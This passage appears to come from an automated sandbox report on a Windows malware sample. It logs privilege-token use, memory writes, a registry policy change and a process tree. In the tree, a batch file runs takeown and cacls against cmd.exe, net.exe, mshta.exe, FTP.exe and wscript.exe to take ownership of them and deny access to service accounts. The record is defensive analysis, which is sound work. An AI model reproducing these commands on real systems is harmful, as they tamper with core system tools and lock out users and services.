2756 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe Token: SeTakeOwnershipPrivilege 2756 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe Token: SeTakeOwnershipPrivilege 2756 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe Token: SeTakeOwnershipPrivilege 2756 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe Token: SeTakeOwnershipPrivilege 2756 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe Token: SeTakeOwnershipPrivilege 2756 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe Token: SeTakeOwnershipPrivilege 2756 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe Token: SeTakeOwnershipPrivilege 2756 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe Token: SeTakeOwnershipPrivilege 2756 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe Token: SeTakeOwnershipPrivilege 2756 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe Token: SeTakeOwnershipPrivilege 2756 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe Token: SeTakeOwnershipPrivilege 2756 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe Token: SeTakeOwnershipPrivilege 2756 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe Token: SeTakeOwnershipPrivilege 2756 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe Token: SeTakeOwnershipPrivilege 2756 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe Token: SeTakeOwnershipPrivilege 2756 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe Token: SeTakeOwnershipPrivilege 2756 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe Token: SeTakeOwnershipPrivilege 2756 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe Token: SeTakeOwnershipPrivilege 2756 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe Token: SeTakeOwnershipPrivilege 2756 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe Token: SeTakeOwnershipPrivilege 2756 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1216 wrote to memory of 4720 1216 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe 97 PID 1216 wrote to memory of 4720 1216 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe 97 PID 4720 wrote to memory of 3944 4720 cmd.exe 100 PID 4720 wrote to memory of 3944 4720 cmd.exe 100 PID 4720 wrote to memory of 4856 4720 cmd.exe 101 PID 4720 wrote to memory of 4856 4720 cmd.exe 101 PID 4720 wrote to memory of 376 4720 cmd.exe 102 PID 4720 wrote to memory of 376 4720 cmd.exe 102 PID 4720 wrote to memory of 2188 4720 cmd.exe 103 PID 4720 wrote to memory of 2188 4720 cmd.exe 103 PID 4720 wrote to memory of 4944 4720 cmd.exe 104 PID 4720 wrote to memory of 4944 4720 cmd.exe 104 PID 4720 wrote to memory of 4316 4720 cmd.exe 105 PID 4720 wrote to memory of 4316 4720 cmd.exe 105 PID 4720 wrote to memory of 3112 4720 cmd.exe 106 PID 4720 wrote to memory of 3112 4720 cmd.exe 106 PID 4720 wrote to memory of 2616 4720 cmd.exe 107 PID 4720 wrote to memory of 2616 4720 cmd.exe 107 PID 4720 wrote to memory of 5100 4720 cmd.exe 108 PID 4720 wrote to memory of 5100 4720 cmd.exe 108 PID 4720 wrote to memory of 3808 4720 cmd.exe 109 PID 4720 wrote to memory of 3808 4720 cmd.exe 109 PID 4720 wrote to memory of 2132 4720 cmd.exe 110 PID 4720 wrote to memory of 2132 4720 cmd.exe 110 PID 4720 wrote to memory of 4628 4720 cmd.exe 111 PID 4720 wrote to memory of 4628 4720 cmd.exe 111 PID 4720 wrote to memory of 1516 4720 cmd.exe 112 PID 4720 wrote to memory of 1516 4720 cmd.exe 112 PID 4720 wrote to memory of 4912 4720 cmd.exe 113 PID 4720 wrote to memory of 4912 4720 cmd.exe 113 PID 4720 wrote to memory of 748 4720 cmd.exe 114 PID 4720 wrote to memory of 748 4720 cmd.exe 114 PID 4720 wrote to memory of 3088 4720 cmd.exe 115 PID 4720 wrote to memory of 3088 4720 cmd.exe 115 PID 4720 wrote to memory of 3564 4720 cmd.exe 116 PID 4720 wrote to memory of 3564 4720 cmd.exe 116 PID 4720 wrote to memory of 4296 4720 cmd.exe 117 PID 4720 wrote to memory of 4296 4720 cmd.exe 117 PID 4720 wrote to memory of 2040 4720 cmd.exe 118 PID 4720 wrote to memory of 2040 4720 cmd.exe 118 PID 4720 wrote to memory of 4112 4720 cmd.exe 119 PID 4720 wrote to memory of 4112 4720 cmd.exe 119 PID 4720 wrote to memory of 3612 4720 cmd.exe 120 PID 4720 wrote to memory of 3612 4720 cmd.exe 120 PID 4720 wrote to memory of 2172 4720 cmd.exe 121 PID 4720 wrote to memory of 2172 4720 cmd.exe 121 PID 4720 wrote to memory of 3152 4720 cmd.exe 122 PID 4720 wrote to memory of 3152 4720 cmd.exe 122 PID 4720 wrote to memory of 3496 4720 cmd.exe 123 PID 4720 wrote to memory of 3496 4720 cmd.exe 123 PID 4720 wrote to memory of 1788 4720 cmd.exe 124 PID 4720 wrote to memory of 1788 4720 cmd.exe 124 PID 4720 wrote to memory of 2548 4720 cmd.exe 125 PID 4720 wrote to memory of 2548 4720 cmd.exe 125 PID 4720 wrote to memory of 4172 4720 cmd.exe 126 PID 4720 wrote to memory of 4172 4720 cmd.exe 126 PID 4720 wrote to memory of 2884 4720 cmd.exe 127 PID 4720 wrote to memory of 2884 4720 cmd.exe 127 PID 4720 wrote to memory of 2844 4720 cmd.exe 128 PID 4720 wrote to memory of 2844 4720 cmd.exe 128 PID 4720 wrote to memory of 4656 4720 cmd.exe 129 PID 4720 wrote to memory of 4656 4720 cmd.exe 129 PID 4720 wrote to memory of 2512 4720 cmd.exe 130 PID 4720 wrote to memory of 2512 4720 cmd.exe 130 -
System policy modification 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0" fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe"C:\Users\Admin\AppData\Local\Temp\fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe"1⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1216 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Kill-Delete.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:4720 -
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v "AutoRun" /f3⤵PID:3944
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\system32\cmd.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4856
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:376
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\cmd.exe /g Administrators:f3⤵PID:2188
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4944
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\cmd.exe /e /g Users:r3⤵PID:4316
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3112
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\cmd.exe /e /g Administrators:r3⤵PID:2616
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5100
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\cmd.exe /e /d SERVICE3⤵PID:3808
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2132
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\cmd.exe /e /d mssqlserver3⤵PID:4628
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1516
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\cmd.exe /e /d "network service"3⤵PID:4912
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:748
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\cmd.exe /e /g system:r3⤵PID:3088
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3564
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\cmd.exe /e /d mssql$sqlexpress3⤵PID:4296
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\cmd.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2040
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4112
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\cmd.exe /g Administrators:f3⤵PID:3612
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2172
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /g Users:r3⤵PID:3152
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3496
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /g Administrators:r3⤵PID:1788
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2548
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /d SERVICE3⤵PID:4172
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2884
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /d mssqlserver3⤵PID:2844
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4656
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /d "network service"3⤵PID:2512
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2968
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /g system:r3⤵PID:3636
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:5036
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /d mssql$sqlexpress3⤵PID:4420
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\system32\net.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3944
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2100
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\net.exe /g Administrators:f3⤵PID:376
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2348
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\net.exe /e /g Users:r3⤵PID:1324
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4316
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\net.exe /e /g Administrators:r3⤵PID:2776
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1712
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\net.exe /e /d SERVICE3⤵PID:4640
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4884
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\net.exe /e /d mssqlserver3⤵PID:1368
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3300
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\net.exe /e /d "network service"3⤵PID:4912
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1364
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\net.exe /e /d system3⤵PID:2984
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3648
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\net.exe /e /d mssql$sqlexpress3⤵PID:4284
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\net.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3652
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1876
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\net.exe /g Administrators:f3⤵PID:3280
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2132
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\net.exe /e /g Users:r3⤵PID:2232
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3864
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\net.exe /e /g Administrators:r3⤵PID:3112
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3440
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\net.exe /e /d SERVICE3⤵PID:4596
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4640
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\net.exe /e /d mssqlserver3⤵PID:4536
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2448
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\net.exe /e /d "network service"3⤵PID:2616
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2976
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\net.exe /e /d system3⤵PID:2040
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2336
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\net.exe /e /d mssql$sqlexpress3⤵PID:4944
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\system32\net1.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2936
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4108
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\net1.exe /g Administrators:f3⤵PID:4028
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4828
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\net1.exe /e /g Users:r3⤵PID:4112
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4948
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\net1.exe /e /g Administrators:r3⤵PID:3676
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3652
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\net1.exe /e /d SERVICE3⤵PID:2032
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2356
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\net1.exe /e /d mssqlserver3⤵PID:3280
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3900
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\net1.exe /e /d "network service"3⤵PID:4068
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1900
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\net1.exe /e /d system3⤵PID:3692
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4420
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\net1.exe /e /d mssql$sqlexpress3⤵PID:1428
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\net1.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4884
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2260
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\net1.exe /g Administrators:f3⤵PID:1712
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3564
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /g Users:r3⤵PID:1928
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5016
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /g Administrators:r3⤵PID:2232
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1256
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /d SERVICE3⤵PID:4468
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4288
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /d mssqlserver3⤵PID:3816
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4536
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /d "network service"3⤵PID:2080
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:864
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /d system3⤵PID:1216
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2172
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /d mssql$sqlexpress3⤵PID:4028
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\system32\mshta.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4188
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3512
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\mshta.exe /g Administrators:f3⤵PID:3896
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1876
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\mshta.exe /e /g Users:r3⤵PID:3908
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3480
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\mshta.exe /e /g Administrators:r3⤵PID:2032
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5016
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\mshta.exe /e /d SERVICE3⤵PID:3916
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4588
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\mshta.exe /e /d mssqlserver3⤵PID:4912
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:5044
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\mshta.exe /e /d "network service"3⤵PID:4596
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4856
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\mshta.exe /e /d system3⤵PID:4352
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4172
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\mshta.exe /e /d mssql$sqlexpress3⤵PID:752
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\mshta.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1900
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4316
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\mshta.exe /g Administrators:f3⤵PID:1428
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4692
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /g Users:r3⤵PID:3392
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2936
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /g Administrators:r3⤵PID:3576
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5004
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /d SERVICE3⤵PID:864
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3952
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /d mssqlserver3⤵PID:408
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2348
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /d "network service"3⤵PID:4112
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2912
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /d system3⤵PID:3908
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3192
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /d mssql$sqlexpress3⤵PID:1796
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\system32\FTP.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4068
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1436
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\FTP.exe /g Administrators:f3⤵PID:1428
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3952
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\FTP.exe /e /g Users:r3⤵PID:2260
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5104
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\FTP.exe /e /g Administrators:r3⤵PID:2356
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4420
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\FTP.exe /e /d SERVICE3⤵PID:752
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2776
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\FTP.exe /e /d mssqlserver3⤵PID:1936
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1436
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\FTP.exe /e /d "network service"3⤵PID:1528
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2100
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\FTP.exe /e /d system3⤵PID:1428
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4108
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\FTP.exe /e /d mssql$sqlexpress3⤵PID:3788
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\FTP.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3896
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3152
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\FTP.exe /g Administrators:f3⤵PID:2468
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5044
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /g Users:r3⤵PID:4596
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1060
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /g Administrators:r3⤵PID:3440
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2652
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /d SERVICE3⤵PID:4172
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4884
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /d mssqlserver3⤵PID:4316
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4960
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /d "network service"3⤵PID:3564
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1236
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /d system3⤵PID:4548
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3900
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /d mssql$sqlexpress3⤵PID:4380
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\system32\wscript.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3692
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1012
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\wscript.exe /g Administrators:f3⤵PID:2832
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:436
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\wscript.exe /e /g Users:r3⤵PID:2976
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1396
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\wscript.exe /e /g Administrators:r3⤵PID:2988
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1936
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\wscript.exe /e /d SERVICE3⤵PID:4944
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3676
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\wscript.exe /e /d mssqlserver3⤵PID:932
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4992
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\wscript.exe /e /d "network service"3⤵PID:3112
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2132
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\wscript.exe /e /d system3⤵PID:3200
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2300
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\wscript.exe /e /d mssql$sqlexpress3⤵PID:4960
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\wscript.exe /a3⤵
- Modifies file permissions
